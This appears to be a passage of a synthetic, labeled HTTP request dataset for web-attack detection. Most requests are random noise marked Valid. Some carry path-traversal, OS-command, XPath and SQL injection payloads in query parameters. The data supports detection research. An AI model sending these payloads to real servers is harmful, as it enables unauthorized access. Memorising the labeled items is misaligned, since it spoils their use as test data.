2Dt8esmldetT=5Svr6Y7I&q9tmpaOv1dropLNsock_streamu=7555944&UaHgroup byPRftp.f5Sor=s9acW&co7iwdtpg1=656774

End - Id: 34998
Start - Id: 36083
class: PathTransversal
GET /i7aLB1H2hegdu/j5akouvratsttlmdn.jpg?woisP3ymUyqLeon=tmlhttpa&kEinsertpapfromL7K.=428&Et=zvO&Ieegoiwknnlr=shrsppr&tpcePitpwebcme=989&aae=27576&ses3eeamoeopn08=enh&VAT3_oYiCXKi=a5bgMP&iBo2snaN=u7nGllhlWnihuj&ls=iqea&Dyusiannemg=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Hth=%7Chtpass&oe=Sris%29%7E%3Ahaving+lke%3ES%3Btt&nr3tnt=h3zDd0 HTTP/1.1
Host: www.A9nE0druS.ch:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1251;q=0.3, iso-2022-jp;q=0.3, euc-kr;q=0.0, windows-1254;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 189.28.10.96
Cookie: pmcl=ita36ens0aij:d ;eEpnR7sRe3tteoz=hvbscriptnuuds;lgiwSoHbnnl=sEZbWXMCu44X;WAboteweMgi=crtld
Cookie2: $Version="98"
Date: Mon, 30 Aug 04 14:07:11 UTC
ETag: "7fLBlcqP1.G7Uml"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 04 Sep 07 06:36:54 GMT
If-Unmodified-Since: Tue, 16 Jan 07 18:18:18 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Sep 09 18:46:51 UTC
Max-Forwards: 604
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM cm1id2VuZ3R0ZG5yaG9jbmVqOHNpc3JxczVsaWlveHdzR25hb0xuZHA=
Authorization: Basic ZmlzaGl3dDo5b29vcmN3
Range: 580617-399630,-49399
Referer: /atseH7h/masdcIo.nsf
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.1 (compatible; eixIfe; Open BSD i386; aktetlOATp)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 039x0543
Via: HTTP/2.1 246.111.76.97
Transfer-Encoding: identity
Upgrade: sztad/3.9, y9oto/3.0
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36083
Start - Id: 43377
class: OsCommanding
GET /twtfgeAyflnae7thed/eakC.X33/m2tr/NLftp7r_enBXCJif/cz/onPrm8thiteunTsv/tLmbt9Y1QsobdZOJj5Y/iohHmI/ojFPEAtp/yYUUtH0cutup1.css?eoie4sth=cmathpaaZtaanha0&m8mamaaewtrlo=aNHS-kGui9Pe&qioh=899130&teranoroE=1622260&ruTr=ieG&s8e6etfrhnts=2&ar9nAgvseftuitT=ls+-las+++++%2Fhome%2F++%7C&dXn=47&olww=tidcrsnhposition37&sietom8dNthtma=+%24%25&lyetW=rar8s&Fompfi6tte=nerotiAIdPeo&el25f=hpcH67%40haZ&hrsd=e9r HTTP/1.1
Host: www.h1thioerf.biz:80
Connection: yepbt3ew
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 218.45.110.121
Cookie: rdpEu9o=o8rten$at~dyNuhsama
Cookie2: $Version="667"
Date: Mon, 01 May 06 01:35:24 UTC
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: aoukreuC
From: utidoe@qznd.net
If-Modified-Since: Mon, 16 Mar 09 04:11:25 GMT
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: "GpOCC_XEdXv367O"
If-None-Match: *
If-Range: "zHHE3.kwA1FIsV0opf"
Max-Forwards: 19
MIME-Version: 2.7
Pragma: jntdishi=r
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: http://www.ntfo.com/aoaRar/hnitbn/ixtmbm/ar4a7ie6/cichewen.php4
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/4.1 (compatible; MSIE 1.9; Linux i386; ledh)
UA-CPU: Sparc
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 0.1 224.219.111.72:53267
Transfer-Encoding: compress
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 17.138.146.187
X-Serial-Number: 68319129
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43377
Start - Id: 13652
class: Valid
GET /Oy9UAMol/ieaerooahs/4Ne2L/hr/xLjusrwRJzXZ@4I/e4IH.QGbY1KtBq2/ts/QR63eIy/rmyZBi/onmjeneaeGregtrhna.mspx? HTTP/1.0
Host: 91.146.218.146:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: ut5is4p7-doaS2o
Cache-Control: no-store
Client-ip: 196.2.232.227
Cookie: r04neeAsaneUeor=881621318;s1hd9oHro29of=ol7unnz8liO5i;cplsSMtelnetm=10482;uahitc=8470816;eArtntcj8=713
Cookie2: $Version="7"
Date: Tue, 16 Nov 04 22:29:17 UTC
ETag: "ykesxgegBw10@NQ4R3hu"
Expect: oetrq
From: 2uses@EiiTw.cz
If-Modified-Since: Mon, 27 Feb 06 02:21:24 CET
If-Unmodified-Since: Mon, 04 Jun 07 13:17:18 CET
If-Match: "n1Jy28AAEzor9ofu5O"
If-None-Match: "FN@4NsddeQ-P9nPJXQ"
If-Range: "T-84o.7@JNU7bF6t"
Max-Forwards: 4
MIME-Version: 2.2
Pragma: r4l='0qvyaxlm'
Proxy-Authorization: NTLM eWRkY3Y1ZnNhRGZuY3Jpc292b3Rhb2hlaXRzQm9jZXQzaWg2ZGUxcmFlNGhibmNh
Authorization: NTLM aWFnbmV5bkloZWlocWUyZXNpaUpoMDZ1aWJlYXRsU2hlYw==
Range: 61-
Referer: /leEniseh.asp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: oWcM1orF3 http://www.sudrh.st
UA-CPU: StrongARM
UA-Disp: 0718,4997,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 673x825
Via: nkic8/8.5 www.eadETC0.html, 7.4 www.x0ieOyg.gif
Transfer-Encoding: compress
Upgrade: inj/7.8, aoi/1.3, oOi/5.0, dits/3.0
Warning: 513 237.169.183.222 "rhoswiakelmoorssshe" 
X-Forwarded-For: 180.126.109.12
X-Serial-Number: 0322804461176059
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13652
Start - Id: 7468
class: Valid
PUT /y5tet/rjZXD/0bblBYOVpo.PPS4/uLUtM715.htm? HTTP/1.1
Content-Length: 202
Content-Language: hee,wmN6Nti,aarebara
Content-Encoding: deflate
Content-Location: http://fa5dlrb.de/g9vy/tbhvEna.js
Content-MD5: cnRybmFzdXdlZmF0dnBrdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Aug 04 03:23:56 UTC
Last-Modified: Thu, 16 Sep 04 15:33:45 GMT
Host: www.cseerhrm.cz:0
Connection: close
Accept: */*
Accept-Charset: iso-8859-1, iso-10646-ucs-2;q=0.9, big5;q=0.0, isiri-3342, cp-950;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 104.160.13.173
Cookie: mywwtkt4eBnc=d;dX@m=55609715;hLxterm1=rribl tt;flta=hzgaaheettama
Cookie2: $Version="923"
Date: Mon, 11 Aug 08 20:53:55 UTC
ETag: "WGe7-zYKUlhh0kn@YUc3"
Expect: oOhnhs
From: simeoAtp@bzmstxmta.de
If-Modified-Since: Sun, 06 Sep 09 12:18:59 GMT
If-Unmodified-Since: Tue, 11 Aug 09 19:42:23 UTC
If-Match: ".HbQVRNM@QDu-oXLrLr"
If-None-Match: *
If-Range: "qBmTlWu806NQUFi"
Max-Forwards: 22
MIME-Version: 0.5
Pragma: AeitreO=w
Proxy-Authorization: NTLM dDFyZGhPbGkzSG5udWFPdG9zdGk5b2VxZmhkckVvZW5lZGll
Authorization: ealre oo451E=2eehlh
Range: 20-
Referer: http://www.uoeerm.org/huct/taiobier.html
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/7.8 (X11; U; SunOS sun4u 1.3; rn-g5; rv:0.4.1) Gecko/10640345
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 061x614
Via: 7.1 181.129.211.111, HTTP/3.3 151.104.37.227:8
Transfer-Encoding: fmir; 9afkauzn=m52drd3n
Upgrade: omrin/0.6
Warning: 177 www.a7afEsZ.js "b2loadjpr" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 68240
----: -----------
~~~~~: ~~~~~~~~~~~~~

sjt9=ettfE0hmrPimpsEkho&uoreeualan=eR5Zg0sz3&aeztn=huhi&htn9nnkm8ynoie=ilc&lmp_=40&DauRxtt=1h8d&ehvneuarm=9729&v6PHN=n0o&rtTeni=rSurCI&mmsmln0=s%6tpho=uss|c+t&wriig11s=uHwZo&eaveer4Ie2MKra=60588

End - Id: 7468
Start - Id: 27602
class: Valid
GET /mqlcnpkeYk/pHm1rWojA9lj6F/oxpKopenFWSEf/een/Zer/iaoetnnTa2ul7ctlersr/edpldyGlqHl/sjY2_B.htm?wtt=2087188628&PaxhtcthSn4ntas=7200106095&bin4S-tsP=ttoEryp8sAnpqel&0dmfromdgB_mM7pL=nxKR&@lyhKCsXTG=eoI8n.P-f6&sdtttneoteat=n+tst4n%5Bes&ac=4aYP&u8r=6&secWea01e=7435&dacrctdsihd2ta=72505795&Yh20Nb=072577&aiaA=0B2wOdlD_t&toemnmh86n4bfjn=53764218&lrlx=aJrw7d HTTP/1.0
Host: www.poscae.cz
Connection: close
Accept: audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=95
Client-ip: 90.232.89.168
Cookie: rlr=658032;o5nasrl9le=7338;oiarhibes9M=~oamail;riteetce1=5
Cookie2: $Version="3"
Date: Fri, 12 Jun 09 16:08:23 UTC
ETag: "KVtY7dYtV4waMq2VI35"
Expect: 7ieoel
From: oieTnE@t0eayas.com
If-Modified-Since: Sun, 12 Jul 09 22:18:07 CET
If-Unmodified-Since: Wed, 29 Aug 07 20:25:25 UTC
If-Match: "waeY9V9YaP4qlaVqg"
If-None-Match: "0Cp2aN634m4StrU2z"
If-Range: "B4zNr-.IDKbTyGBPbmE."
Max-Forwards: 784
MIME-Version: 7.3
Pragma: rEh46yss=HNa8
Proxy-Authorization: NTLM dHRmdHRhb3JvYWVSbmVlZWRtdHNvb2RDOW50bnJlaW82dHdObjBlbA==
Authorization: wulus elytih=seotir2
Range: 29139-636434,80033-87
Referer: /rnbip/bebkto/CqS3aIlc/muNoEiw/loe4efo.jpg
TE: gzip;q=0.7,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.1 (X11; U; Linux i586 4.7; em-la; rv:3.7.0) Gecko/56701882
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3851x1748
Via: 1.3 194.231.178.5
Transfer-Encoding: deflate
Upgrade: es7eq/6.2, pcche/7.4, rtrNe/7.5, rzgt/8.5, 2dS/8.1
Warning: 292 30.176.242.223 "IaZ49eusrm" 
X-Forwarded-For: 12.84.128.82
X-Serial-Number: 189697977036477
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27602
Start - Id: 30143
class: Valid
GET /OR9taNconnectRR/nigV/oe3no4enudcfenai5zA/enejoEEknb/iYtIredlaTebtnhd/tfroagsSte6he/dwoQdG0QKwKFPVMta/hUJjM.jpeg?C1eV=sMFk67HJl&il2seHea=aeoser+eoxHeval&nodoo5dEtTonhtt=0to HTTP/1.1
Host: www.ir3r.fr
Connection: close
Accept: text/*, text/plain, image/png
Accept-Charset: iso-8859-6, iso-2022-kr;q=0.1, ks_c_5601-1987;q=0.2, iso-8859-15;q=0.3, koi8-r
Accept-Encoding: *;q=0.1
Accept-Language: iaoa3-kal, egdir-Sw, af1-r, 32-xs, tbsenfea-e3rtor;q=0.2
Cache-Control: min-fresh=07086
Client-ip: 33.172.35.145
Cookie: 9p8echoC=sss9H;rmt_p4=kd29;c8slTemize1icn=yWoeidwov;ja1oTm=fap
Cookie2: $Version="5"
Date: Sat, 20 Jun 09 20:16:41 UTC
ETag: "56R-Fm_uD_@qvTi2CaIg"
Expect: 100-continue
From: Hrht@stsembt.uk
If-Modified-Since: Fri, 19 Dec 08 13:19:08 CET
If-Unmodified-Since: Thu, 07 Sep 06 08:02:17 UTC
If-Match: "-R.GyLl31b9pIXSZuv"
If-None-Match: *
If-Range: Sun, 21 Mar 04 09:21:21 CET
Max-Forwards: 994
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic dDJyb2VuOm9zYnRh
Authorization: NTLM aW9yR2RsdG5zcWNybzRsdG1uZTRyTkFvcW5tc29zbmt1MmF5ZW9jZA==
Range: -418366,88-
Referer: http://www.sqeof.biz/qr7rofUl/sndchon4/leadyilp.msf
TE: gzip;q=0.3,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.1 (compatible; ielhshem; Open BSD i386; xbai)
UA-CPU: Sparc
UA-Disp: 3355,7302,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2809x7842
Via: 9.2 www.osde.shtml
Transfer-Encoding: gzip
Upgrade: rners/6.8, wOlaEq/9.2
Warning: 949 87.230.32.41 "do1d6" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 420548237983036906
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30143
Start - Id: 35616
class: XPathInjection
GET /m4t/yz8awtloocslaawjEyi/ibK/s6r2sfnrsem/0GVqRP8unionBTF..tiff?ttEe9lormzor=oa&gLwindow.openo=eval%7Ebodyn3&ntaeI3srksr2t=orlnc6htltin&ljgr=copytnCi&w6dliwmletam=fYgBe5Hqh&rei=enceMuyet+arpositionpositionE&wWTh=ewD8blEzYFD3&Qeciayaido=me0cueedmtsri&c9Kqncmd3SBD1log=649056&mYFkGutRx6A=fservicesorQhttpsprocessing-instructionaMdr+aedorl&hce=mx%27++++or+6++%3C++count%28path%2Fchild%3A%3A*%29++or+%27inornUie%27+++%3D++%27&YI0BHUWK0=sFIbiS&nahea=%3AnpassthrubHOBLc5%7E5eau8tr&twr0e=hs HTTP/1.1
Host: 29.120.123.191
Connection: close
Accept: */*;q=0.2
Accept-Charset: shift_jis
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: z='n8eit'
Client-ip: 101.51.218.73
Cookie: l1=tttjtdrqakbswt;HxTNRW9IMWo=swc
Cookie2: $Version="923"
Date: Mon, 22 Dec 08 13:39:58 CET
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: orei@biOfnOuc.com
If-Modified-Since: Thu, 10 Aug 06 09:28:46 CET
If-Unmodified-Since: Wed, 26 Jan 05 08:46:34 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3757
MIME-Version: 1.3
Pragma: abs='4gy'
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: Basic aTBvN29mOmpKdXM=
Range: -827333,2893-
Referer: http://Nwwb.com/tnkr/geAeiwle/ckI3wat/uhia.mdb
TE: trailers,gzip,trailers
Trailer: Host
User-Agent: darqrac9/3.6.8.7
UA-CPU: PowerPC
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: ciiv/8.8 74.176.63.176, 0.3 101.128.38.105
Transfer-Encoding: fese
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35616
Start - Id: 12528
class: Valid
GET /oaabsRas/Ayrl4htghasendfeta.pl?heteBndetane=9l&htpassIji4aUdjhttps=teErooeeoa9btet&owa66t=299650&gmlb=o%27olR&ueetnU=veFlsllbSke HTTP/1.1
Host: 226.72.60.2
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.3, identity;q=0.2
Accept-Language: rt9nn-seoqsd;q=0.2, nhNsr7-Eycsm9, ddeli-lhalau;q=0.5, e4tw-vasiciot;q=0.6
Cache-Control: no-store
Client-ip: 202.79.22.213
Cookie: toUr== rec6)admin t 1dr;oiiqykiIbrmo=);don9adc0mep=qsavS;hebgtth=oatdmrGvoelbje;bUscioep7ayl9t5=nWL33gF-oqdu
Cookie2: $Version="442"
Date: Fri, 29 Jun 07 17:18:22 GMT
ETag: "dRpCqRyMcTgVU0M8z"
Expect: besE8=eiabmece
From: sEao@syhnkioup.de
If-Modified-Since: Wed, 07 Jul 04 08:53:44 UTC
If-Unmodified-Since: Thu, 25 Jun 09 14:55:18 CET
If-Match: *
If-None-Match: "1fm2wyr0XxaqHLzt"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: taeot 3ovn=rfarL
Authorization: dkmt5 agEpnhR=sHdssmy
Range: 79521-822865,4-
Referer: http://snnC0vtt.gov/nnetoeu/heaFets.ace
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.2 (X11; U; Linux i586 3.1; is-ea; rv:3.8.7) Gecko/40882950
UA-CPU: Sparc
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 580x349
Via: 8.2 44.215.221.32
Transfer-Encoding: 4eeC
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 44.18.78.71
X-Serial-Number: 2197491883894
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12528
Start - Id: 16045
class: Valid
GET /ulia/6glhYX7cMwMQy7@0FI/defestsCLr0hat/9tIueb/aidbkxFgIVyPD-BpEj/eaekf6tiy9.dll?rni=ier&ihm6=Oydetnl&rl6th8=9&n6iescentht5=i5f7ru&fqnnmlctAe=Gknjs4ee&3qto=605305 HTTP/1.0
Host: 118.148.87.29:80
Connection: close
Accept: video/mpeg;q=0.3, audio/*, video/*;q=0.8
Accept-Charset: windows-1252, x-mac-hebrew;q=0.0, iso-8859-9;q=0.6
Accept-Encoding: deflate, compress, identity, compress;q=0.7
Accept-Language: utti-eruvAda;q=0.6, oSrbh-etYlne
Cache-Control: max-age=17412
Client-ip: 124.71.218.216
Cookie: l8wgetBdUSopeniexecb=63651255
Cookie2: $Version="8"
Date: Tue, 28 Feb 06 11:45:20 GMT
ETag: "Z5gkMjZc.n_FexmfUp"
Expect: aloirza
From: nsodrd@t9uule.biz
If-Modified-Since: Thu, 19 Aug 04 06:17:41 CET
If-Unmodified-Since: Thu, 23 Dec 04 09:36:09 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Nov 08 02:17:04 GMT
Max-Forwards: 9586
MIME-Version: 5.7
Pragma: b='ufdl'
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -356
Referer: /83koi2/2txid.php
TE: trailers,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.3 (compatible; MSIE 9.3; Win 9x; nst3alae; otas3t)
UA-CPU: x86
UA-Disp: 738,0570,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0422x8842
Via: 5.8 0.123.112.30:1543
Transfer-Encoding: sedth
Upgrade: umjt/5.9
Warning: 293 www.aeei.tiff:0636 "t7sEtihfvebGdaitvu" 
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 0738318676103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16045
Start - Id: 41552
class: SqlInjection
GET /8MrlnZQYcath5LperlFj/nPT6QJk1Y6mguIn.nsf?Mnolotd9botatd=mninclude4yti&utotacqeta=select++Hpisabpa++from++++ALL_USERS&execVy8=zJf&aduewfsrt5t=00797496&ewnw=ek%3BnEk8hafRo+e%7C&enmnstmsjy=0928&47iadar6d=LdmrfepRl3fAte HTTP/1.1
Host: www.kWnahsee9t.cz
Connection: eruleste
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nil2-d5lh5;q=0.5, x3oGwdE-raA;q=0.2, dszT-hiR
Cache-Control: no-transform
Cookie: atinap=d9eei;ci4i2wIhaIne=e?id
Date: Thu, 05 Apr 07 17:17:35 CET
Expect: vnri
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Aug 05 08:47:12 GMT
Max-Forwards: 2
MIME-Version: 5.5
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Referer: /hSocc/tarss.fgf
TE: gzip,deflate
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 7.7; i4-sm; rv:8.1.5) Gecko/38572438
Via: owe9n/7.7 www.iaeatwci.htm
Transfer-Encoding: fng5qo; haut=plAS

null

End - Id: 41552
Start - Id: 23591
class: Valid
GET /iRcAsF5pNYIXUy/e5lo/tLntehcAetrlioGu/tbKG/Nndpasswdstyle0BICpVHo.msf?8opthttpQop=6756112&ri3oo=1&cruG=e+ut%3C-%25naeexecier&gy5e=5546343&NlsxeeioPhbi=i_F&pvlpojt6s7htnF=1052008&nbu=427593&zsulAno=dxp_whereyv&rsMsJ1=4878983&bsNelpkasyy=56521918&haaeqns=dmate&aiOicV=1788&KJx7KyTuvdelete2=54902694&seie=%40suupdatedauat5arnorieia HTTP/1.1
Host: www.tdsasyi.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 240.220.99.142
Cookie: e4r4eetntanr=3isoauc36l
Cookie2: $Version="6"
Date: Tue, 12 Sep 06 04:09:33 GMT
ETag: W/"M6.USDJAf1oMm-mN1sv"
Expect: WFtlEa=s62Apn;bEaareaI=h3edeTeq
From: Aial5osa@Mysrie.uk
If-Modified-Since: Sat, 01 Oct 05 06:00:03 UTC
If-Unmodified-Since: Sun, 09 May 04 14:46:50 CET
If-Match: *
If-None-Match: *
If-Range: "i0TEPVzO8MbYm8oPRc"
Max-Forwards: 66
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: rXite lhh9o=0huotic
Authorization: leht aepcmv2=dh7t8s
Range: 62145-4,-94,41-
Referer: http://www.uauNHc.org/tOieec.txt
TE: trailers,trailers
Trailer: User-Agent
User-Agent: tdhmu2/5.9.6.4.4
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 251x222
Via: 8.2 www.defhnoo.jpg
Transfer-Encoding: identity
Upgrade: oza/2.5
Warning: 942 www.stchto.jpg "wMlilUefo" "Sun, 18 Jun 06 16:19:46 UTC"
X-Forwarded-For: 141.227.170.60
X-Serial-Number: 1009110184973666911
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23591
Start - Id: 31332
class: Valid
GET /Aottarho/ttYMc/9T8XQauh3O7ig/iitulesn/htzekorbj4M7ta9/nHKcxEA2z-sg@oR6O8/d_5aE.Ko9a0_z68e.q/lugnbol/l1Iomrym3epH5J9smoee/ItWWL2/oasa.swf?ecbmrsi=Iu%2Bxp_+ffS%5Dec+q&tWAm02ABa=288 HTTP/1.0
Host: www.enDc.de:80
Connection: keep-alive
Accept: application/*, text/plain;q=0.6, text/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 243.156.176.3
Cookie: lsuc7=update/ r
Cookie2: $Version="030"
Date: Mon, 24 Aug 09 10:51:47 CET
ETag: W/"zr10LAaotkUmY9eP3V6"
Expect: 100-continue
From: tdhih@awtnimi.ch
If-Modified-Since: Wed, 06 Feb 08 04:01:38 UTC
If-Unmodified-Since: Thu, 26 Feb 04 07:39:27 UTC
If-Match: "5JSgUL69higuMig"
If-None-Match: *
If-Range: "jRcnPFfVLoGK8vjrlR4T"
Max-Forwards: 56
MIME-Version: 3.8
Pragma: e='7nnite'
Proxy-Authorization: Basic bTZyMXg6bXM3aQ==
Authorization: ntus qrrx=1TiSes
Range: 826881-
Referer: http://www.hssenod.cz/omteootl.html
TE: gzip;q=0.1,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: 2edHsdeas (eAi7u6lE; wRSE_uRx; 6OEMB3; dgweh7yH; lAnFFnfX)
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2871x6744
Via: 9.0 94.147.95.241, 2.6 39.134.2.205, FTP/7.0 www.4heeep.js
Transfer-Encoding: imnrme; a6rhX=ferEdBny
Upgrade: piC/1.9, snoer/6.7, 5naem/2.3, dlstE/7.8
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 5665287
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31332
Start - Id: 10143
class: Valid
GET /rcdFTOxl2QF9OpfZ9bT/2DGwHvZpCflkbb3FfI/YK1XY9l/74v7V9@vi43R/x4/of37CLVG8fwi5P-.tiff?aNRlO=0 HTTP/1.0
Host: 114.49.105.240
Connection: keep-alive
Accept: text/html, video/mpeg, image/*
Accept-Charset: cp-950;q=0.1, windows-1255;q=0.4, iso-8859-7;q=0.7
Accept-Encoding: compress, identity, deflate;q=0.6, compress;q=0.0
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 190.121.49.181
Cookie: tt6eto=otCYOP9ikF;TDCpositiongFchildpvL=nEfgeuionninaoa
Cookie2: $Version="9"
Date: Thu, 01 Jul 04 02:56:36 UTC
ETag: W/"@_LdD5SoTth2FBGOiH8n"
Expect: wsnon
From: ekUhha@brtt.fr
If-Modified-Since: Sun, 05 Aug 07 13:54:51 UTC
If-Unmodified-Since: Fri, 16 Oct 09 15:42:56 CET
If-Match: *
If-None-Match: *
If-Range: "UkruJmdpSFCT10S"
Max-Forwards: 6559
MIME-Version: 0.7
Pragma: Rivtt=ni
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Digest qop=ellhs
Range: -2030
Referer: /l1oDs7dS/CSnumedo/7hZet.pdf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.9 (compatible; eutee; Linux i586; owtrob8to; ri3b)
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 012x3228
Via: 6.0 36.161.58.143:9
Transfer-Encoding: compress
Upgrade: f0ih/0.7, drees3/6.1
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 42090054187399989
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10143
Start - Id: 14646
class: Valid
GET /c9etcmnV.@wnullnY1object/jDGRdp/@qvWIgHt/sRfdo/nl7/iNrehsvuQhneln3sl.pl?In4xCZ4WYE2a=rteip93ol&uowgs4hta=low6&DeWuELAPXc=emesrgneccsia&G8rjY9d-=meyhsHsk&oiyri8rieetz8ml=2225525&paliena=beiof4ahekrh%3BdT&zy=n34r&0Bwoyigsnt=2041 HTTP/1.0
Host: www.lareatt.ch
Connection: lcTe
Accept: text/plain
Accept-Charset: x-mac-hebrew;q=0.0, windows-1250;q=0.9, iso-8859-4
Accept-Encoding: *
Accept-Language: kcfaeseg-pnju2P;q=0.1, onguuf-tSs;q=0.8, clacasme-MthNceRe;q=0.0, aae3ephe-mhShaa1
Cache-Control: min-fresh=20664
Client-ip: 101.10.193.22
Cookie: 0oirm=5588141
Cookie2: $Version="4"
Date: Wed, 17 Nov 04 14:59:57 CET
ETag: W/"scbCFJ.pAYmVNWtF8"
Expect: dejnL
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Thu, 20 Jan 05 19:31:01 UTC
If-Unmodified-Since: Thu, 06 May 04 13:23:12 GMT
If-Match: "_UhHONFY_GhciwVa-50O"
If-None-Match: *
If-Range: Thu, 03 Dec 09 06:44:36 CET
Max-Forwards: 646
MIME-Version: 1.8
Pragma: su8eo='didotMd'
Proxy-Authorization: sCpta iMitRl=ojmbz
Authorization: NTLM Y0FsZWlzdWR4ZXRyZW5Xbm9pV25kcjZuZWNPdGhtZW5pbA==
Range: 69-7904,-775
Referer: /odxn/huodc0t.tar.gz
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: rie2 (oUIo7JN; ek-@FAFpgL; eWVdh1kvdD; siz6Al.Cna)
UA-CPU: StrongARM
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 557x7129
Via: t5s/7.7 41.1.104.72
Transfer-Encoding: gzip
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
